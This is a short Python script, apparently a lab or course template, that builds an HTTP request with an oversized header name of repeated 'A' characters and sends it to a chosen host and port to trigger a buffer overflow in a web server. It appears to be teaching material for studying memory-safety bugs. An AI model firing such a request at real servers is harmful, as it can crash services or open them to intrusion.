exploit-template.py

#!/usr/bin/env python3
import sys
import socket
import traceback


def build_exploit(key_len):
    """
    Build the HTTP request that will trigger the vulnerability.
    """
    req = "GET /" + " HTTP/1.0\r\n" + \
          "A" * key_len + ": dummy_value \r\n" + \
          "\r\n"
    return req


def send_req(host, port, req):
    """
    Send the HTTP request to the server.
    host: hostname or IP address of the server
    port: port number of the server
    req: the HTTP request to send
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("Connecting to %s:%d..." % (host, port))
    sock.connect((host, port))

    print("Connected, sending request...")
    # sock.send(req)
    sock.sendall(req.encode('utf-8'))
    print("Request sent, waiting for reply...")
    rbuf = sock.recv(1024)
    resp = b""

    while len(rbuf):
        resp = resp + rbuf
        rbuf = sock.recv(1024)

    print("Received reply.")
    sock.close()
    return resp


def main():
    key_len = 20
    if len(sys.argv) < 3:
        print("Usage: " + sys.argv[0] + " host port")
        exit()
    if len(sys.argv) == 4:
        key_len = int(sys.argv[3])
    try:
        req = build_exploit(key_len)
        print("HTTP request:")
        print(req)

        resp = send_req(sys.argv[1], int(sys.argv[2]), req)
        print("HTTP response:")
        print(resp)
    except:
        print("Exception:")
        print(traceback.format_exc())


if __name__ == "__main__":
    main()